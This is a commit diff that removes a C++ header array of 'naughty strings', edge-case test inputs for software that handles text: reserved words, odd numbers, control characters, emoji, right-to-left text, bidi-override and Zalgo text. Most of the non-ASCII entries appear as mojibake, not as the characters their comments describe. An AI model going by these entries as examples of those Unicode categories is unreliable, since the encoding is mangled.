summaryrefslogtreecommitdiff
path: root/include/big_list_of_naughty_strings.hpp
diff options
context:
space:
mode:
Diffstat (limited to 'include/big_list_of_naughty_strings.hpp')
-rw-r--r--include/big_list_of_naughty_strings.hpp1149
1 files changed, 463 insertions, 686 deletions
diff --git a/include/big_list_of_naughty_strings.hpp b/include/big_list_of_naughty_strings.hpp
index 4ba27f73e4..2d1ca0dd74 100644
--- a/include/big_list_of_naughty_strings.hpp
+++ b/include/big_list_of_naughty_strings.hpp
@@ -1,687 +1,464 @@
const std::string naughty_strings[] = {
-// sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt
-
-// Reserved Strings
-//
-// Strings which may be used elsewhere in code
-
-"undefined",
-"undef",
-"null",
-"NULL",
-"(null)",
-"nil",
-"NIL",
-"true",
-"false",
-"True",
-"False",
-"TRUE",
-"FALSE",
-"None",
-"hasOwnProperty",
-"\\",
-"\\\\",
-
-// Numeric Strings
-//
-// Strings which can be interpreted as numeric
-
-"0",
-"1",
-"1.00",
-"$1.00",
-"1/2",
-"1E2",
-"1E02",
-"1E+02",
-"-1",
-"-1.00",
-"-$1.00",
-"-1/2",
-"-1E2",
-"-1E02",
-"-1E+02",
-"1/0",
-"0/0",
-"-2147483648/-1",
-"-9223372036854775808/-1",
-"-0",
-"-0.0",
-"+0",
-"+0.0",
-"0.00",
-"0..0",
-".",
-"0.0.0",
-"0,00",
-"0,,0",
-",",
-"0,0,0",
-"0.0/0",
-"1.0/0.0",
-"0.0/0.0",
-"1,0/0,0",
-"0,0/0,0",
-"--1",
-"-",
-"-.",
-"-,",
-"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999",
-"NaN",
-"Infinity",
-"-Infinity",
-"INF",
-"1#INF",
-"-1#IND",
-"1#QNAN",
-"1#SNAN",
-"1#IND",
-"0x0",
-"0xffffffff",
-"0xffffffffffffffff",
-"0xabad1dea",
-"123456789012345678901234567890123456789",
-"1,000.00",
-"1 000.00",
-"1'000.00",
-"1,000,000.00",
-"1 000 000.00",
-"1'000'000.00",
-"1.000,00",
-"1 000,00",
-"1'000,00",
-"1.000.000,00",
-"1 000 000,00",
-"1'000'000,00",
-"01000",
-"08",
-"09",
-"2.2250738585072011e-308",
-
-// Special Characters
-//
-// ASCII punctuation. All of these characters may need to be escaped in some
-// contexts. Divided into three groups based on (US-layout) keyboard position.
-
-",./;'[]\\-=",
-"<>?:\"{}|_+",
-"!@#$%^&*()`~",
-
-// Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F,
-// and U+007F (DEL)
-// Often forbidden to appear in various text-based file formats (e.g. XML),
-// or reused for internal delimiters on the theory that they should never
-// appear in input.
-// The next line may appear to be blank or mojibake in some viewers.
-"",
-
-// Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F.
-// Commonly misinterpreted as additional graphic characters.
-// The next line may appear to be blank, mojibake, or dingbats in some viewers.
-"ᅡタᅡチᅡツᅡテᅡトᅡニᅡヌᅡネᅡノᅡハᅡヒᅡフᅡヘᅡホᅡマᅡミᅡムᅡメᅡモᅡヤᅡユᅡヨᅡラᅡリᅡルᅡレᅡロᅡワᅡンᅡ゙ᅡ゚",
-
-// Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode
-// version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL),
-// and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often
-// treated as whitespace in some contexts.
-// This file unfortunately cannot express strings containing
-// U+0000, U+000A, or U+000D (NUL, LF, CR).
-// The next line may appear to be blank or mojibake in some viewers.
-// The next line may be flagged for \"trailing whitespace\" in some viewers.
-" ", " ᅡナ £レタ¬タタ¬タチ¬タツ¬タテ¬タト¬タナ¬タニ¬タヌ¬タネ¬タノ¬タハ¬タヒ¬タᄄ¬タᄅ¬タᆵ¬チ゚ ̄タタ",
-
-// Unicode additional control characters: all of the characters with
-// general category Cf (in Unicode 8.0.0).
-// The next line may appear to be blank or mojibake in some viewers.
-"ᅡᆳ￘タ￘チ￘ツ￘テ￘ト￘ナ￘ワᅴンᅵマ£ᅠホ¬タヒ¬タフ¬タヘ¬タホ¬タマ¬タᆰ¬タᆱ¬タᆲ¬タᆳ¬タᆴ¬チᅠ¬チᄀ¬チᄁ¬チᆪ¬チᄂ¬チᆭ¬チᄃ¬チᄄ¬チᄅ¬チᆰ¬チᆱ¬チᆲ¬チᆳ¬チᆴ¬チᆵ￯ᄏ﾿￯﾿ᄍ￯﾿ᄎ￯﾿ᄏ￰ムツᄑ￰ロᄇᅠ￰ロᄇᄀ￰ロᄇᄁ￰ロᄇᆪ￰ンナᄈ￰ンナᄡ￰ンナᄉ￰ンナᄊ￰ンナᄋ￰ンナᄌ￰ンナᄍ￰ンナᄎ￳ᅠタチ￳ᅠタᅠ￳ᅠタᄀ￳ᅠタᄁ￳ᅠタᆪ￳ᅠタᄂ￳ᅠタᆬ￳ᅠタᆭ￳ᅠタᄃ￳ᅠタᄄ￳ᅠタᄅ￳ᅠタᆰ￳ᅠタᆱ￳ᅠタᆲ￳ᅠタᆳ￳ᅠタᆴ￳ᅠタᆵ￳ᅠタᄚ￳ᅠタᄆ￳ᅠタᄇ￳ᅠタᄈ￳ᅠタᄡ￳ᅠタᄉ￳ᅠタᄊ￳ᅠタᄋ￳ᅠタᄌ￳ᅠタᄍ￳ᅠタᄎ￳ᅠタᄏ￳ᅠタᄐ￳ᅠタᄑ￳ᅠタᄒ￳ᅠタ﾿￳ᅠチタ￳ᅠチチ￳ᅠチツ￳ᅠチテ￳ᅠチト￳ᅠチナ￳ᅠチニ￳ᅠチヌ￳ᅠチネ￳ᅠチノ￳ᅠチハ￳ᅠチヒ￳ᅠチフ￳ᅠチヘ￳ᅠチホ￳ᅠチマ￳ᅠチミ￳ᅠチム￳ᅠチメ￳ᅠチモ￳ᅠチヤ￳ᅠチユ￳ᅠチヨ￳ᅠチラ￳ᅠチリ￳ᅠチル￳ᅠチレ￳ᅠチロ￳ᅠチワ￳ᅠチン￳ᅠヂ￳ᅠチ゚￳ᅠチᅠ￳ᅠチᄀ￳ᅠチᄁ￳ᅠチᆪ￳ᅠチᄂ￳ᅠチᆬ￳ᅠチᆭ￳ᅠチᄃ￳ᅠチᄄ￳ᅠチᄅ￳ᅠチᆰ￳ᅠチᆱ￳ᅠチᆲ￳ᅠチᆳ￳ᅠチᆴ￳ᅠチᆵ￳ᅠチᄚ￳ᅠチᄆ￳ᅠチᄇ￳ᅠチᄈ￳ᅠチᄡ￳ᅠチᄉ￳ᅠチᄊ￳ᅠチᄋ￳ᅠチᄌ￳ᅠチᄍ￳ᅠチᄎ￳ᅠチᄏ￳ᅠチᄐ￳ᅠチᄑ￳ᅠチᄒ￳ᅠチ﾿",
-
-// \"Byte order marks\", U+FEFF and U+FFFE, each on its own line.
-// The next two lines may appear to be blank or mojibake in some viewers.
-"￯ᄏ﾿",
-"￯﾿ᄒ",
-
-// Unicode Symbols
-//
-// Strings which contain common unicode symbols (e.g. smart quotes)
-
-"ᅫᄅ¬ノネᅢᄃ¬ネレ¬ネᆱᅨワᅡᄉ¬ノᄂ¬ノᆬᅢᄋ",
-"ᅢᆬᅢ゚¬ネツᅥメᅡ례ル¬ネニᅨレᅡᆲ¬タᆭᅢᆭ",
-"ᅤモ¬ネムᅡᄡᅡᆴ¬タᅠᅡᆬᅡ뗴ニᅢ죄タ¬タワ¬タリ",
-"ᅡᄀ¬ト깏ᅡᄁ¬ネ゙ᅡ다ᄊ¬タ깕ᅡᄎ¬タモ¬ノᅠ",
-"ᅡ졔ロᅢヌ¬ラハᅣ몌ワᅢツᅡᆵᅨリᅡ﾿",
-"ᅢナᅢヘᅢホᅢマᅨンᅢモᅢヤ￯ᆪ﾿ᅢメᅢレᅢニ¬リテ",
-"ᅤメ¬ダᅡᄡ¬タᄚᅨヌᅢチᅡ뗴ニᅢリ¬ネマ¬タン¬タル",
-"`¬チト¬ツᆲ¬タᄍ¬タᄎ￯ᆲチ￯ᆲツ¬タ가ᄚᅡᄋ¬タレ¬タヤᅡᄆ",
-"¬ナロ¬ナワ¬ナン¬ナ゙",
-"￐チ￐ツ￐テ￐ト￐ナ￐ニ￐ヌ￐ネ￐ノ￐ハ￐ヒ￐フ￐ヘ￐ホ￐マ￐ミ￐ム￐メ￐モ￐ヤ￐ユ￐ヨ￐ラ￐リ￐ル￐レ￐ロ￐ワ￐ン￐゙￐゚￐ᅠ￐ᄀ￐ᄁ￐ᆪ￐ᄂ￐ᆬ￐ᆭ￐ᄃ￐ᄄ￐ᄅ￐ᆰ￐ᆱ￐ᆲ￐ᆳ￐ᆴ￐ᆵ￐ᄚ￐ᄆ￐ᄇ￐ᄈ￐ᄡ￐ᄉ￐ᄊ￐ᄋ￐ᄌ￐ᄍ￐ᄎ￐ᄏ￐ᄐ￐ᄑ￐ᄒ￐﾿￑タ￑チ￑ツ￑テ￑ト￑ナ￑ニ￑ヌ￑ネ￑ノ￑ハ￑ヒ￑フ￑ヘ￑ホ￑マ",
-"￙ᅠ￙ᄀ￙ᄁ￙ᆪ￙ᄂ￙ᆬ￙ᆭ￙ᄃ￙ᄄ￙ᄅ",
-
-// Unicode Subscript/Superscript/Accents
-//
-// Strings which contain unicode subscripts/superscripts; can cause rendering issues
-
-"¬チᄚ¬チᄡ¬チᄉ",
-"¬ツタ¬ツチ¬ツツ",
-"¬チᄚ¬チᄡ¬チᄉ¬ツタ¬ツチ¬ツツ",
-"¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ ¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ ¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ",
-
-// Quotation Marks
-//
-// Strings which contain misplaced quotation marks; can cause encoding errors
-
-"'",
-"\"",
-"''",
-"\"\"",
-"'\"'",
-"\"''''\"'\"",
-"\"'\"'\"''''\"",
-"<foo val=¬タワbar¬タン />",
-"<foo val=¬タワbar¬タン />",
-"<foo val=¬タンbar¬タワ />",
-"<foo val=`bar' />",
-
-// Two-Byte Characters
-//
-// Strings which contain two-byte characters: can cause rendering issues or character-length issues
-
-"￧ヤᄚ¦ᄌᆳ ̄チユ ̄ツモ ̄チᆱ ̄チツ ̄チメ ̄チᆭ¦ᄌヒ ̄チユ ̄チト",
-" ̄テム ̄テᄐ ̄テニ ̄ツᆪ ̄テᄐ ̄チᄌ│ᄀフ ̄チヒ ̄チᆰ ̄チト ̄チヒ",
-"¥メフ│ᆪᄑ₩ᄐᄁ│ᆰ゙",
-"←テᄄ│ミᄑ₩ᅠᄐ",
-"↓ツᆲ■レフ↑ᄈᄐ■ユル↓ロミ ↓ヨᄡ■ユル↓ラᄚ↑ᄉᆲ↓ニフ",
-"↓ᄚᆭ↓ᄚᄄ→ᆬᄐ ■テタ↑ᄈᅠ ↓リᄄ ■ホᄇ↓ヒワ→ᄃᄄ↑ᄈᄐ ↓ムロ→ヒᄂ→ᆭᆲ →リᅠ→ᄚᄅ↑ᄚチ■ユリ",
-"￧ᄂᄒ₩ワテ￧ᄃム¥ᆳᄌ←ルᄁ│ᆰ゙¥ᆳᄌ￧ᅠヤ￧ᄅᄊ₩ノタ",
-"↓レᄌ→゙タ→ᄚヤ■ニᅠ→ᆬᄡ",
-"￰ᅠワホ￰ᅠワᄆ￰ᅠンᄍ￰ᅠᄆモ￰ᅠᄆᄌ￰ᅠᄇヨ￰ᅠᄈマ",
-
-// Changing length when lowercased
-//
-// Characters which increase in length (2 to 3 bytes) when lowercased
-// Credit: https://twitter.com/jifa/status/625776454479970304
-
-"￈ᄎ",
-"￈ᄒ",
-
-// Japanese Emoticons
-//
-// Strings which consists of Japanese-style emoticons which are popular on the web
-
-" ̄テᄑ¢ᄐᄐ¢ᄎネ￙トᅪワ¢ᄎネ¢ᄐᄑ￯ᄒノ  ̄テᄑ¢ᄐᄐ¢ᄎネ￙トᅪワ¢ᄎネ¢ᄐᄑ￯ᄒノ",
-"(￯ᄑᄀ¬ラユ ¬ネタ ¬ラユ￯ᄑᄀ)",
-"￯ᄑタ￯ᄑᄄ(ᅡᄡ¬ネタ￯ᄑタ¬ネᄅ",
-"__￯ᄒロ(,_,*)",
-" ̄テᄏ(￯﾿ᆪ¬ネタ￯﾿ᆪ) ̄テᄏ:*:",
-"￯ᄒ゚￯ᄑᆬ¬ワ﾿ ̄テᄒ¬ユᄇ(￯ᄑᄀ¬ラユ¬タ﾿¬ラユ￯ᄑᄀ)¬ユᄆ¬ワ﾿￯ᄑᆬ￯ᄒ゚",
-", ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル( ¬リᄏ ᅬノ ¬リᄏ ) ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル",
-"(¬ユᆵᅡᄚ¬ヨ가ᄚ￯ᄐノ¬ユᆵ￯ᄌᄉ ¬ヤᄏ¬ヤチ¬ヤᄏ)",
-"(￯ᄒノ¢ᄇᆬ￧ロハ¢ᄇᆬ￯ᄐノ￯ᄒノ￯ᄏ﾿ ¬ヤᄏ¬ヤチ¬ヤᄏ",
-"¬ヤᆲ¬ヤタ¬ヤᆲ ̄テホ( ᅡᄎ _ ᅡᄎ ̄テホ)",
-"( ᅪ가ᄚ ᅪワᅧヨ ᅪ가ᄚ)",
-
-// Emoji
-//
-// Strings which contain Emoji; should be the same behavior as two-byte characters, but not always
-
-"￰゚リヘ",
-"￰゚ムᄅ￰゚マᄑ",
-"￰゚ムᄒ ￰゚ルヌ ￰゚メチ ￰゚ルナ ￰゚ルニ ￰゚ルヒ ￰゚ルホ ￰゚ルヘ",
-"￰゚ミᄉ ￰゚ルネ ￰゚ルノ ￰゚ルハ",
-"¬ンᄂ￯ᄌマ ￰゚メヤ ￰゚メフ ￰゚メユ ￰゚メ゙ ￰゚メモ ￰゚メラ ￰゚メヨ ￰゚メリ ￰゚メン ￰゚メ゚ ￰゚メワ ￰゚メロ ￰゚メレ ￰゚メル",
-"¬ワヒ￰゚マ﾿ ￰゚メᆰ￰゚マ﾿ ￰゚ムミ￰゚マ﾿ ￰゚ルフ￰゚マ﾿ ￰゚ムマ￰゚マ﾿ ￰゚ルマ￰゚マ﾿",
-"￰゚レᄒ ￰゚ニメ ￰゚ニモ ￰゚ニユ ￰゚ニヨ ￰゚ニラ ￰゚ニル ￰゚マᄃ",
-"0￯ᄌマ¬テᆪ 1￯ᄌマ¬テᆪ 2￯ᄌマ¬テᆪ 3￯ᄌマ¬テᆪ 4￯ᄌマ¬テᆪ 5￯ᄌマ¬テᆪ 6￯ᄌマ¬テᆪ 7￯ᄌマ¬テᆪ 8￯ᄌマ¬テᆪ 9￯ᄌマ¬テᆪ ￰゚ヤ゚",
-
-// Regional Indicator Symbols
-//
-// Regional Indicator Symbols can be displayed differently across
-// fonts, and have a number of special behaviors
-
-"￰゚ヌᄎ￰゚ヌᄌ￰゚ヌᄋ￰゚ヌᄎ￰゚ヌᄌ ￰゚ヌᆭ￰゚ヌᆱ￰゚ヌᆭ￰゚ヌᄇ￰゚ヌᄌ",
-"￰゚ヌᄎ￰゚ヌᄌ￰゚ヌᄋ￰゚ヌᄎ￰゚ヌᄌ￰゚ヌᆭ￰゚ヌᆱ￰゚ヌᆭ￰゚ヌᄇ",
-"￰゚ヌᄎ￰゚ヌᄌ￰゚ヌᄋ￰゚ヌᄎ￰゚ヌᄌ￰゚ヌᆭ",
-
-// Unicode Numbers
-//
-// Strings which contain unicode numbers; if the code is localized, it should see the input as numeric
-
-"￯ᄐム￯ᄐメ￯ᄐモ",
-"￙ᄀ￙ᄁ￙ᆪ",
-
-// Right-To-Left Strings
-//
-// Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew)
-
-"￘ᆱ￙ナ ￙ニ￙チ￘ᄈ ￘ᄈ￙ツ￘ᄋ￘ᆰ ￙ネ￘ᄄ￘ᄃ￙ト￘ᆰ￘ᆳ￘ᆵ￙ハ￘ᆵ￘フ, ￘ᆲ￘ᄇ￙ハ￘ᄆ￘ᆰ￙ハ ￘ᄄ￘ᄃ￘ᄈ￘ᆰ￘ᆴ￘ᆵ￘ᄃ￙ナ ￘ᆪ￙ニ ￘ᆵ￙ニ￙ネ. ￘ᆬ￘ᄚ ￙ヌ￙ニ￘ᄃ￘゚ ￘ᄃ￙ト￘ᄈ￘ᆰ￘ᄃ￘ᄆ ￙ネ￘ᆰ￙ニ￘ᄉ￙ハ￘ᄄ ￙テ￘ᄃ￙ニ. ￘ᆪ￙ヌ￙ム￙ト ￘ᄃ￙ハ￘ᄋ￘ᄃ￙ト￙ハ￘ᄃ￘フ ￘ᄄ￘ᄆ￙ハ￘ᄋ￘ᄃ￙ニ￙ハ￘ᄃ-￙チ￘ᄆ￙ニ￘ᄈ￘ᄃ ￙ツ￘ᆵ ￘ᆪ￘ᆴ￘ᄚ. ￘ᄈ￙ト￙ハ￙ナ￘ᄃ￙ニ￘フ ￘ᆬ￘ᆰ￙チ￘ᄃ￙ツ￙ハ￘ᄅ ￘ᄄ￙ハ￙ニ ￙ナ￘ᄃ, ￙ハ￘ᄚ￙テ￘ᄆ ￘ᄃ￙ト￘ᆳ￘ᆵ￙ネ￘ᆵ ￘ᆪ￙ハ ￘ᄄ￘ᄍ￘ᆵ, ￙ナ￘ᄍ￘ᄃ￙ナ￙ト￘ᄅ ￘ᄄ￙ネ￙ト￙ニ￘ᆵ￘ᄃ￘フ ￘ᄃ￙ト￘ᆬ￘ᄋ￙ト￘ᄃ￙ツ ￘ᄍ￙ト ￘ᆬ￙ハ￙ネ.",
-"ᅲムᅱᄚᅱ튜뛰슈ミᅲ뤼ᄡᅲチᅲルᅲᆰ, ᅲムᅱ쥐튜뛰쥬ミ ᅲミᅱ뮤ワᅱ쮸ヤᅱᄡᅲルᅲン, ᅲミᅱ슑 ᅲヤᅱ유뤼쥐튜チᅲ゙ᅱ유ルᅱᄡᅲン, ᅲユᅱᄚᅲミᅱ슑 ᅲヤᅱ쥬ミᅱ쥬뛰쓙",
-"ᅲヤᅱ쥬ルᅱᄚᅲᆰᅱ쥬ヤtest￘ᄃ￙ト￘ᄉ￙チ￘ᆳ￘ᄃ￘ᆰ ￘ᄃ￙ト￘ᆰ￙ム￘ᆳ￙ネ￙ト",
-"￯ᄋᄑ",
-"￯ᄋᄎ",
-"￙ナ￙マ￙ニ￙ホ￘ᄃ￙ツ￙ホ￘ᄡ￙ホ￘ᄅ￙マ ￘ᄈ￙マ￘ᄄ￙マ￙ト￙ミ ￘ᄃ￙ミ￘ᄈ￙メ￘ᆰ￙ミ￘ᆴ￙メ￘ᆵ￙ホ￘ᄃ￙ナ￙ミ ￘ᄃ￙ト￙ト￙ム￙マ￘ᄎ￙ホ￘ᄅ￙ミ ￙チ￙ミ￙ハ ￘ᄃ￙ト￙ニ￙ム￙マ￘ᄌ￙マ￙ナ￙ミ ￘ᄃ￙ト￙メ￙ツ￙ホ￘ᄃ￘ᆭ￙ミ￙ナ￙ホ￘ᄅ￙ミ ￙ネ￙ホ￙チ￙ミ￙ハ￙ナ ￙ハ￙ホ￘ᆴ￙マ￘ᄉ￙ム￙ホ ￘ᄃ￙ト￘ᆰ￙ム￙ホ￘ᄋ￙メ￘ᄄ￙ミ￙ハ￙ツ￙ホ￘ᄃ￘ᆰ￙マ ￘ᄃ￙ト￙メ￘ᆳ￘ᄃ￘ᄈ￙マ￙ネ￘ᄄ￙ミ￙ハ￙ム￙ホ￘ᄅ￙マ￘フ ",
-
-// Trick Unicode
-//
-// Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf)
-
-"¬タᆰ¬タᆰtest¬タᆰ",
-"¬タᆱtest¬タᆱ",
-"¬タᄅtest¬タᄅ",
-"test¬チᅠtest¬タᆱ",
-"¬チᆭtest¬チᄃ",
-
-// Zalgo Text
-//
-// Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net)
-
-"£ᄍᄚᅩ초초ユoᅪ゙ ᅩᄋiᅩ볿ᅪヌᅩᆰᅪルnᅩンᅩラᅪユvᅩ゚ᅩワᅩリᅩᆭᅪ゚oᅩ쏘ルᅩᄚᅩᅠkᅢ똬レᅩᆴᅩ촑ᅩ쪼모ᄂ ᅩヨtᅩンᅪユᅩ뽃ᅩ콝ᅪ゙hᅩ톼モᅩ볺ᅩ뽀リᅩᄇeᅪヌᅩᆪᅩᄚᅩᆭᅩᆲᅪホ ᅩ꼬토코모リhᅪレᅪホᅪルᅩワᅩᆪᅩ봐ナiᅩᆭᅩ볷ᅩᄚᅩᄂvᅩ콰ヘeᅩ촔ᅩ뽉ᅩᄚ-mᅩᄁiᅪナnᅩヨᅩ초゙ᅩ봂ᅩᄚdᅩ소토゚ᅪルᅩ로토リᅩᄈ ᅩ゙ᅩᆬᅩ모뽌rᅩロᅩラᅩリeᅪルpᅪᅠrᅩ토゙ᅩ콠ᅩラeᅩ초ᅠᅩᆪᅪ゚sᅩリᅪヌᅩ뽜ヘᅩンᅪノeᅪノᅩᆬᅩᆵᅩ゙ᅩ봐レᅩᆲᅪワᅦ쫇ᅪホᅪホᅩ゚ᅩヨᅪヌᅩᄂtᅪヘᅩᆲᅩ놔モᅩ톬ᅪリᅪナiᅩᆰᅩᄆnᅪᅠgᅩᄡᅪノ ᅪマᅪノᅪナcᅩᆲᅩ゚hᅪᄀaᅩᆱᅩ콢ᅪリoᅩᆱᅩ゚ᅩヨᅪヘᅩルᅩンᅪノsᅩラᅩᆭᅩᄇ.ᅩ또쫘ネᅩᆪ",
-"ᅩ과モᅩ゙ᅪナIᅩラᅩリᅩᆭᅪンnᅪヌᅪヌᅪルvᅩᆴᅩᆱokᅩ볾ᅩルᅪネiᅩヨᅪルᅩᆳᅩ쪼ᅠᅩ゙nᅩ고콡ᅩᆪᅩᄎgᅩ봐ネᅪルᅩᆳᅪルᅩᆲᅪホ ᅩᄚtᅪヤᅩᆭhᅩ゙ᅩᄇeᅩ꼬ᄂ ᅪヘᅩᆲᅩ봐ヨfᅩᄡᅩリᅪユᅩᆪᅢ똬ヨ£ᄎ쫁ᅩᄅlᅪヨᅪヤᅪレiᅪモᅪレᅩᆭᅪᅠnᅪヨᅪヘᅩラᅪモᅩ뽍gᅪヘ ᅩᄄoᅪレᅩᆰᅪᄀfᅩリᅩᆪᅩᆲ ᅩヨᅩリᅪヨᅩ゚ᅪルᅩᆴcᅭノᅪヤᅩᆱᅪヨᅪモᅪヌᅪヨᅪナhᅩ소녻ᅪレᅪヤᅢ고ラᅩ톼ユᅪナoᅩ톣ᅩᆬsᅩ뫄ネᅩ초ヨᅩᆭᅩ콰ᄁ.ᅩロᅩヨᅩ゙ᅩᅠᅩᆱᅩᄚ",
-"ᅩラᅩ촤ヨᅩ쫊ᅪモ£ᄍᆴᅩ놔ヘᅩᆬᅪヌᅪネhᅩ보チeᅪマᅪモᅩ토ラᅩルᅩ톣ᅪヤ ᅪヌᅩワᅩ모ᅠᅪモᅪヘᅪナNᅪユᅪᅠeᅩラᅩᄆzᅩリᅩンᅩワᅩ촤ルpᅩ노초쫘ヘᅩᆵᅪレeᅩᅠᅩ코ᅠᅪワrᅩ또놔ヘᅩ초ヨᅪヤᅩヨᅩヨdᅩᅠᅩ゚ᅩᆳᅩᆲᅩンᅪ゚iᅩᆭᅪヨᅩ롸モᅪヤᅩᄂaᅩᅠᅩラᅩᆲᅪノᅩルnᅪレᅪワ ᅩ코゙ᅩᄚᅪレᅪナhᅩ솨ノiᅩ뽀゙vᅩ꽈ヌ£ᄌルᅪホᅪ゚-ᅭノᅩᆳᅩ로톼ヤmᅩ놄ᅩᆱiᅪユᅪヌᅩンᅩᆭnᅩラᅪル£ᄌヘᅩ゚ ᅩᆵᅩ봐ユᅪ゙ᅦᆱᅩ゚ᅩᆵᅩᄚᅩ봐ルᅩ코ンf ᅩᆰᅩᄚᅩᄚᅩラᅩヨᅩᆳᅩリᅪリcᅩᆭᅪヘᅩ보゙ᅪヘᅩ로ル£ᄌᆬᅪレaᅩᆴᅪホᅩ゚ᅩルᅪワᅥ고로쫘ホsᅩᄂ.ᅩンᅩン ᅭノZᅩ고ヨᅩワᅪヨᅩᄚᅩᆪᅪノᅩワaᅪヨᅩᄚᅪルᅩᆲᅪᄀlᅩ볾ᅩ뽜ヘᅩᄅgᅩ고゚ᅩ토뫄レᅩ゙ᅩᆲᅪナoᅩラᅪワ.ᅩ゚",
